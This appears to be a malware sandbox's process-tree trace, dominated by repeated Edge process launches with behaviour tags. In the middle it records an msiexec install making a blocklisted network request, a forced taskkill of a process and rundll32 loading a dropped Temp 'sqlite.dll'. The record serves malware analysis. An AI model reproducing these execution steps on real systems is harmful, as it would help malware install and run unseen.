C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7BFCAA516EB63249E6E74D7574236884 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 36E719F09B0670EDCD6651929CCB50242⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4E99163DD34E73E58694A70B6752864D E Global\MSI00002⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 6163⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
